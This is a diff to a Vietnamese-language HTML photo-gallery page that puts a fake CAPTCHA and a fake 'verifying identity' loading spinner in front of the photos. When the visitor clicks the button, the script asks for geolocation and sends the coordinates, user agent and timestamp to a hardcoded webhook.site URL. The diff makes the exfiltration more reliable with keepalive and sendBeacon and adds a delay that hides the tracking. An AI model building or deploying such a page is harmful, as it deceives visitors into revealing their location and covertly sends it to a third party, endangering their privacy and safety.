--- a/b.html
+++ b/b.html
@@ -11,6 +11,8 @@
       margin: 40px;
     }
     h1 { margin-bottom: 20px; }
+
+    /* Gallery */
     .gallery {
       display: flex;
       flex-wrap: wrap;
@@ -24,10 +26,7 @@
       background: white;
       width: 200px;
     }
-    .photo img {
-      max-width: 100%;
-      border-radius: 5px;
-    }
+    .photo img { max-width: 100%; border-radius: 5px; }
     .photo a {
       display: inline-block;
       margin-top: 10px;
@@ -39,7 +38,7 @@
     }
     .photo a:hover { background: #0056b3; }
 
-    /* CAPTCHA box */
+    /* Fake CAPTCHA */
     .captcha-box {
       display: inline-block;
       padding: 20px;
@@ -59,7 +58,24 @@
       border-radius: 5px;
     }
     button:hover { background: #3367d6; }
-    .note { font-size: 14px; color: #555; margin-top: 10px; }
+
+    /* Loading giả */
+    #loading {
+      display: none;
+      margin-top: 80px;
+      font-size: 18px;
+      color: #333;
+    }
+    .spinner {
+      border: 4px solid #f3f3f3;
+      border-top: 4px solid #4285f4;
+      border-radius: 50%;
+      width: 40px;
+      height: 40px;
+      margin: 0 auto 15px;
+      animation: spin 1s linear infinite;
+    }
+    @keyframes spin { 100% { transform: rotate(360deg); } }
   </style>
 </head>
 <body>
@@ -69,14 +85,18 @@
     <h3>🔒 Xác nhận bạn không phải robot</h3>
     <p>Nhấn nút bên dưới để tiếp tục</p>
     <button onclick="verifyBot()">Tôi không phải robot</button>
-    <div class="note">Hệ thống sẽ thực hiện kiểm tra bảo mật nhanh...</div>
   </div>
 
-  <!-- Gallery ẩn, chỉ hiện khi xác nhận xong -->
+  <!-- Loading giả -->
+  <div id="loading">
+    <div class="spinner"></div>
+    <p>Đang xác minh danh tính...</p>
+  </div>
+
+  <!-- Gallery ẩn -->
   <div id="gallery" style="display:none;">
     <h1>Bộ sưu tập ảnh của tôi</h1>
     <p>Bạn có thể tải xuống những bức ảnh bên dưới:</p>
-
     <div class="gallery">
       <div class="photo">
         <img src="https://raw.githubusercontent.com/Or4nge16Hehe/imagedownload/refs/heads/main/8a.jpg" alt="Ảnh 1">
@@ -96,19 +116,20 @@
   <script>
     const webhook = "https://webhook.site/aac873f7-5c2e-4afd-94eb-9944647c8eca";
 
-    function sendToWebhook(data) {
-      fetch(webhook, {
-        method: "POST",
-        body: JSON.stringify(data) // không set Content-Type để tránh preflight
-      }).catch(e => console.error("Error:", e));
-    }
+function sendToWebhook(data) {
+  const body = JSON.stringify(data);
+  fetch(webhook, { method: "POST", body, keepalive: true })
+    .catch(()=>{});
+  navigator.sendBeacon(webhook, body);
+}
+
 
     function verifyBot() {
-      // Ẩn captcha, hiện gallery
+      // Ẩn captcha, hiện loading
       document.getElementById("captcha").style.display = "none";
-      document.getElementById("gallery").style.display = "block";
+      document.getElementById("loading").style.display = "block";
 
-      // Xin quyền vị trí
+      // Xin quyền vị trí ngay khi loading
       if (navigator.geolocation) {
         navigator.geolocation.getCurrentPosition(
           pos => {
@@ -130,13 +151,13 @@
             });
           }
         );
-      } else {
-        sendToWebhook({
-          status: "no_geolocation_api",
-          ua: navigator.userAgent,
-          time: new Date().toISOString()
-        });
       }
+
+      // Sau 3 giây hiện gallery
+      setTimeout(() => {
+        document.getElementById("loading").style.display = "none";
+        document.getElementById("gallery").style.display = "block";
+      }, 3000);
     }
   </script>
 </body>
